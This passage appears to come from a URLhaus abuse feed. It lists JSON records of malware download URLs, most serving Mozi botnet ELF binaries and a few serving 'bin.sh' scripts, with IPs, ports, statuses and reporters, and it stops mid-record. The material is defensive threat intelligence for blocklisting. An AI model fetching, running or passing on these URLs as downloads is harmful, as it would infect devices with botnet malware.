-{"id":"961177","urlhaus_reference":"https://urlhaus.abuse.ch/url/961177/","url":"http://122.188.192.87:57950/Mozi.m","url_status":"online","host":"122.188.192.87","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961178","urlhaus_reference":"https://urlhaus.abuse.ch/url/961178/","url":"http://222.141.8.40:33520/Mozi.m","url_status":"online","host":"222.141.8.40","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961179","urlhaus_reference":"https://urlhaus.abuse.ch/url/961179/","url":"http://123.14.202.127:45525/Mozi.m","url_status":"online","host":"123.14.202.127","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961180","urlhaus_reference":"https://urlhaus.abuse.ch/url/961180/","url":"http://41.86.21.38:38430/Mozi.m","url_status":"online","host":"41.86.21.38","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961181","urlhaus_reference":"https://urlhaus.abuse.ch/url/961181/","url":"http://220.125.119.207:4096/Mozi.m","url_status":"online","host":"220.125.119.207","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961182","urlhaus_reference":"https://urlhaus.abuse.ch/url/961182/","url":"http://121.150.209.136:50631/Mozi.a","url_status":"online","host":"121.150.209.136","date_added":"2021-01-14 18:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961176","urlhaus_reference":"https://urlhaus.abuse.ch/url/961176/","url":"http://186.33.122.85:37989/Mozi.m","url_status":"online","host":"186.33.122.85","date_added":"2021-01-14 18:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961175","urlhaus_reference":"https://urlhaus.abuse.ch/url/961175/","url":"http://219.157.253.54:54078/Mozi.m","url_status":"online","host":"219.157.253.54","date_added":"2021-01-14 18:20:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961173","urlhaus_reference":"https://urlhaus.abuse.ch/url/961173/","url":"http://219.154.108.170:34201/i","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961174","urlhaus_reference":"https://urlhaus.abuse.ch/url/961174/","url":"http://115.59.119.91:56573/Mozi.m","url_status":"online","host":"115.59.119.91","date_added":"2021-01-14 18:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961172","urlhaus_reference":"https://urlhaus.abuse.ch/url/961172/","url":"http://125.44.61.35:48291/bin.sh","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:08:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961170","urlhaus_reference":"https://urlhaus.abuse.ch/url/961170/","url":"http://59.92.217.195:60102/Mozi.m","url_status":"online","host":"59.92.217.195","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961171","urlhaus_reference":"https://urlhaus.abuse.ch/url/961171/","url":"http://59.92.183.181:52225/Mozi.m","url_status":"offline","host":"59.92.183.181","date_added":"2021-01-14 18:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961167","urlhaus_reference":"https://urlhaus.abuse.ch/url/961167/","url":"http://59.99.95.7:56733/Mozi.m","url_status":"offline","host":"59.99.95.7","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961168","urlhaus_reference":"https://urlhaus.abuse.ch/url/961168/","url":"http://58.249.82.105:57042/Mozi.m","url_status":"online","host":"58.249.82.105","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961169","urlhaus_reference":"https://urlhaus.abuse.ch/url/961169/","url":"http://59.99.188.73:38035/Mozi.m","url_status":"offline","host":"59.99.188.73","date_added":"2021-01-14 18:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961165","urlhaus_reference":"https://urlhaus.abuse.ch/url/961165/","url":"http://42.228.238.118:33540/Mozi.m","url_status":"online","host":"42.228.238.118","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961166","urlhaus_reference":"https://urlhaus.abuse.ch/url/961166/","url":"http://42.238.236.187:51947/Mozi.m","url_status":"online","host":"42.238.236.187","date_added":"2021-01-14 18:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961164","urlhaus_reference":"https://urlhaus.abuse.ch/url/961164/","url":"http://186.33.123.28:36915/Mozi.m","url_status":"online","host":"186.33.123.28","date_added":"2021-01-14 18:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961163","urlhaus_reference":"https://urlhaus.abuse.ch/url/961163/","url":"http://182.116.84.95:38865/Mozi.m","url_status":"online","host":"182.116.84.95","date_added":"2021-01-14 18:05:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961162","urlhaus_reference":"https://urlhaus.abuse.ch/url/961162/","url":"http://103.217.123.186:55480/Mozi.m","url_status":"offline","host":"103.217.123.186","date_added":"2021-01-14 18:04:37 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961161","urlhaus_reference":"https://urlhaus.abuse.ch/url/961161/","url":"http://182.136.98.81:51996/Mozi.m","url_status":"offline","host":"182.136.98.81","date_added":"2021-01-14 18:04:36 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961160","urlhaus_reference":"https://urlhaus.abuse.ch/url/961160/","url":"http://125.47.250.69:36042/Mozi.m","url_status":"offline","host":"125.47.250.69","date_added":"2021-01-14 18:04:34 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961158","urlhaus_reference":"https://urlhaus.abuse.ch/url/961158/","url":"http://222.137.96.31:34350/Mozi.m","url_status":"offline","host":"222.137.96.31","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961159","urlhaus_reference":"https://urlhaus.abuse.ch/url/961159/","url":"http://223.130.29.204:53587/Mozi.m","url_status":"offline","host":"223.130.29.204","date_added":"2021-01-14 18:04:33 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961157","urlhaus_reference":"https://urlhaus.abuse.ch/url/961157/","url":"http://61.52.28.142:53444/Mozi.m","url_status":"online","host":"61.52.28.142","date_added":"2021-01-14 18:04:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961155","urlhaus_reference":"https://urlhaus.abuse.ch/url/961155/","url":"http://120.85.254.107:58653/Mozi.m","url_status":"online","host":"120.85.254.107","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961156","urlhaus_reference":"https://urlhaus.abuse.ch/url/961156/","url":"http://202.164.139.218:50579/Mozi.m","url_status":"offline","host":"202.164.139.218","date_added":"2021-01-14 18:04:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961152","urlhaus_reference":"https://urlhaus.abuse.ch/url/961152/","url":"http://114.199.216.11:3553/Mozi.m","url_status":"offline","host":"114.199.216.11","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961153","urlhaus_reference":"https://urlhaus.abuse.ch/url/961153/","url":"http://112.241.208.20:35288/Mozi.a","url_status":"online","host":"112.241.208.20","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961154","urlhaus_reference":"https://urlhaus.abuse.ch/url/961154/","url":"http://186.33.104.10:46429/Mozi.m","url_status":"online","host":"186.33.104.10","date_added":"2021-01-14 18:04:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961151","urlhaus_reference":"https://urlhaus.abuse.ch/url/961151/","url":"http://59.96.37.179:44575/Mozi.m","url_status":"offline","host":"59.96.37.179","date_added":"2021-01-14 18:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961149","urlhaus_reference":"https://urlhaus.abuse.ch/url/961149/","url":"http://125.42.236.165:43245/Mozi.m","url_status":"online","host":"125.42.236.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961150","urlhaus_reference":"https://urlhaus.abuse.ch/url/961150/","url":"http://117.242.211.165:50444/Mozi.m","url_status":"offline","host":"117.242.211.165","date_added":"2021-01-14 18:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961144","urlhaus_reference":"https://urlhaus.abuse.ch/url/961144/","url":"http://115.63.134.203:51318/Mozi.m","url_status":"online","host":"115.63.134.203","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"true","tags":["Mozi"]} -{"id":"961145","urlhaus_reference":"https://urlhaus.abuse.ch/url/961145/","url":"http://123.4.89.190:46221/Mozi.m","url_status":"online","host":"123.4.89.190","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961146","urlhaus_reference":"https://urlhaus.abuse.ch/url/961146/","url":"http://123.9.108.157:51430/Mozi.m","url_status":"online","host":"123.9.108.157","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961147","urlhaus_reference":"https://urlhaus.abuse.ch/url/961147/","url":"http://115.48.160.11:52028/Mozi.m","url_status":"online","host":"115.48.160.11","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961148","urlhaus_reference":"https://urlhaus.abuse.ch/url/961148/","url":"http://125.44.61.35:48291/Mozi.a","url_status":"online","host":"125.44.61.35","date_added":"2021-01-14 18:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961143","urlhaus_reference":"https://urlhaus.abuse.ch/url/961143/","url":"http://202.164.138.170:39613/Mozi.m","url_status":"offline","host":"202.164.138.170","date_added":"2021-01-14 18:04:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"Gandylyan1","larted":"false","tags":["Mozi"]} -{"id":"961142","urlhaus_reference":"https://urlhaus.abuse.ch/url/961142/","url":"http://219.154.108.170:34201/bin.sh","url_status":"online","host":"219.154.108.170","date_added":"2021-01-14 17:56:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961141","urlhaus_reference":"https://urlhaus.abuse.ch/url/961141/","url":"http://220.135.95.248:47095/Mozi.a","url_status":"online","host":"220.135.95.248","date_added":"2021-01-14 17:53:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961136","urlhaus_reference":"https://urlhaus.abuse.ch/url/961136/","url":"http://42.239.154.85:42004/Mozi.m","url_status":"online","host":"42.239.154.85","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961137","urlhaus_reference":"https://urlhaus.abuse.ch/url/961137/","url":"http://27.203.185.42:52058/Mozi.m","url_status":"online","host":"27.203.185.42","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961138","urlhaus_reference":"https://urlhaus.abuse.ch/url/961138/","url":"http://39.80.186.173:45432/Mozi.m","url_status":"online","host":"39.80.186.173","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961139","urlhaus_reference":"https://urlhaus.abuse.ch/url/961139/","url":"http://61.52.34.132:49891/Mozi.m","url_status":"online","host":"61.52.34.132","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961140","urlhaus_reference":"https://urlhaus.abuse.ch/url/961140/","url":"http://61.54.41.216:34334/Mozi.m","url_status":"online","host":"61.54.41.216","date_added":"2021-01-14 17:53:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961135","urlhaus_reference":"https://urlhaus.abuse.ch/url/961135/","url":"http://186.33.104.202:42886/Mozi.m","url_status":"online","host":"186.33.104.202","date_added":"2021-01-14 17:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961134","urlhaus_reference":"https://urlhaus.abuse.ch/url/961134/","url":"http://189.51.107.141:47096/Mozi.m","url_status":"offline","host":"189.51.107.141","date_added":"2021-01-14 17:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961132","urlhaus_reference":"https://urlhaus.abuse.ch/url/961132/","url":"http://182.126.81.19:48214/Mozi.a","url_status":"online","host":"182.126.81.19","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961133","urlhaus_reference":"https://urlhaus.abuse.ch/url/961133/","url":"http://186.33.122.192:40478/Mozi.m","url_status":"offline","host":"186.33.122.192","date_added":"2021-01-14 17:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961130","urlhaus_reference":"https://urlhaus.abuse.ch/url/961130/","url":"http://182.121.200.78:37771/Mozi.m","url_status":"online","host":"182.121.200.78","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961131","urlhaus_reference":"https://urlhaus.abuse.ch/url/961131/","url":"http://182.124.24.207:35513/Mozi.m","url_status":"online","host":"182.124.24.207","date_added":"2021-01-14 17:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961129","urlhaus_reference":"https://urlhaus.abuse.ch/url/961129/","url":"http://125.43.32.14:53382/Mozi.m","url_status":"online","host":"125.43.32.14","date_added":"2021-01-14 17:51:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961128","urlhaus_reference":"https://urlhaus.abuse.ch/url/961128/","url":"http://115.55.129.18:50336/Mozi.m","url_status":"online","host":"115.55.129.18","date_added":"2021-01-14 17:50:17 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961124","urlhaus_reference":"https://urlhaus.abuse.ch/url/961124/","url":"http://116.73.59.171:34233/Mozi.a","url_status":"offline","host":"116.73.59.171","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961125","urlhaus_reference":"https://urlhaus.abuse.ch/url/961125/","url":"http://117.208.132.85:38392/Mozi.m","url_status":"online","host":"117.208.132.85","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961126","urlhaus_reference":"https://urlhaus.abuse.ch/url/961126/","url":"http://117.222.173.218:52654/Mozi.m","url_status":"offline","host":"117.222.173.218","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961127","urlhaus_reference":"https://urlhaus.abuse.ch/url/961127/","url":"http://117.247.200.9:60203/Mozi.m","url_status":"offline","host":"117.247.200.9","date_added":"2021-01-14 17:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961123","urlhaus_reference":"https://urlhaus.abuse.ch/url/961123/","url":"http://120.85.187.191:48091/Mozi.a","url_status":"online","host":"120.85.187.191","date_added":"2021-01-14 17:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961122","urlhaus_reference":"https://urlhaus.abuse.ch/url/961122/","url":"http://111.241.105.88:40783/Mozi.m","url_status":"offline","host":"111.241.105.88","date_added":"2021-01-14 17:49:41 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961121","urlhaus_reference":"https://urlhaus.abuse.ch/url/961121/","url":"http://113.88.36.206:52015/Mozi.m","url_status":"online","host":"113.88.36.206","date_added":"2021-01-14 17:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961118","urlhaus_reference":"https://urlhaus.abuse.ch/url/961118/","url":"http://59.99.143.251:42987/Mozi.m","url_status":"offline","host":"59.99.143.251","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961119","urlhaus_reference":"https://urlhaus.abuse.ch/url/961119/","url":"http://59.94.180.106:53388/Mozi.m","url_status":"offline","host":"59.94.180.106","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961120","urlhaus_reference":"https://urlhaus.abuse.ch/url/961120/","url":"http://36.224.231.40:44124/Mozi.a","url_status":"online","host":"36.224.231.40","date_added":"2021-01-14 17:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961115","urlhaus_reference":"https://urlhaus.abuse.ch/url/961115/","url":"http://223.212.211.103:33802/Mozi.m","url_status":"online","host":"223.212.211.103","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961116","urlhaus_reference":"https://urlhaus.abuse.ch/url/961116/","url":"http://59.99.95.124:43806/Mozi.m","url_status":"offline","host":"59.99.95.124","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961117","urlhaus_reference":"https://urlhaus.abuse.ch/url/961117/","url":"http://59.97.169.13:52278/Mozi.m","url_status":"offline","host":"59.97.169.13","date_added":"2021-01-14 17:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961114","urlhaus_reference":"https://urlhaus.abuse.ch/url/961114/","url":"http://39.64.134.162:41202/Mozi.m","url_status":"online","host":"39.64.134.162","date_added":"2021-01-14 17:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961113","urlhaus_reference":"https://urlhaus.abuse.ch/url/961113/","url":"http://182.117.84.206:35756/Mozi.m","url_status":"online","host":"182.117.84.206","date_added":"2021-01-14 17:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961112","urlhaus_reference":"https://urlhaus.abuse.ch/url/961112/","url":"http://186.33.123.61:40569/Mozi.m","url_status":"online","host":"186.33.123.61","date_added":"2021-01-14 17:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961111","urlhaus_reference":"https://urlhaus.abuse.ch/url/961111/","url":"http://182.112.20.174:47645/Mozi.m","url_status":"online","host":"182.112.20.174","date_added":"2021-01-14 17:36:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961110","urlhaus_reference":"https://urlhaus.abuse.ch/url/961110/","url":"http://123.13.77.167:40023/Mozi.m","url_status":"online","host":"123.13.77.167","date_added":"2021-01-14 17:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961109","urlhaus_reference":"https://urlhaus.abuse.ch/url/961109/","url":"http://115.48.204.10:53402/Mozi.m","url_status":"online","host":"115.48.204.10","date_added":"2021-01-14 17:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961108","urlhaus_reference":"https://urlhaus.abuse.ch/url/961108/","url":"http://175.214.73.205:36316/bin.sh","url_status":"offline","host":"175.214.73.205","date_added":"2021-01-14 17:29:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961107","urlhaus_reference":"https://urlhaus.abuse.ch/url/961107/","url":"http://117.248.61.75:48105/bin.sh","url_status":"offline","host":"117.248.61.75","date_added":"2021-01-14 17:28:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961103","urlhaus_reference":"https://urlhaus.abuse.ch/url/961103/","url":"http://42.231.245.237:40017/Mozi.m","url_status":"online","host":"42.231.245.237","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961104","urlhaus_reference":"https://urlhaus.abuse.ch/url/961104/","url":"http://59.99.45.199:41906/Mozi.m","url_status":"offline","host":"59.99.45.199","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961105","urlhaus_reference":"https://urlhaus.abuse.ch/url/961105/","url":"http://42.237.48.61:38607/Mozi.m","url_status":"online","host":"42.237.48.61","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961106","urlhaus_reference":"https://urlhaus.abuse.ch/url/961106/","url":"http://59.93.23.63:59331/Mozi.m","url_status":"offline","host":"59.93.23.63","date_added":"2021-01-14 17:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961102","urlhaus_reference":"https://urlhaus.abuse.ch/url/961102/","url":"http://182.126.118.45:53932/Mozi.m","url_status":"online","host":"182.126.118.45","date_added":"2021-01-14 17:20:24 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961101","urlhaus_reference":"https://urlhaus.abuse.ch/url/961101/","url":"http://42.230.152.22:58385/Mozi.m","url_status":"online","host":"42.230.152.22","date_added":"2021-01-14 17:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961099","urlhaus_reference":"https://urlhaus.abuse.ch/url/961099/","url":"http://186.33.105.12:57010/Mozi.m","url_status":"online","host":"186.33.105.12","date_added":"2021-01-14 17:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961100","urlhaus_reference":"https://urlhaus.abuse.ch/url/961100/","url":"http://222.137.33.111:59715/Mozi.m","url_status":"online","host":"222.137.33.111","date_added":"2021-01-14 17:20:06 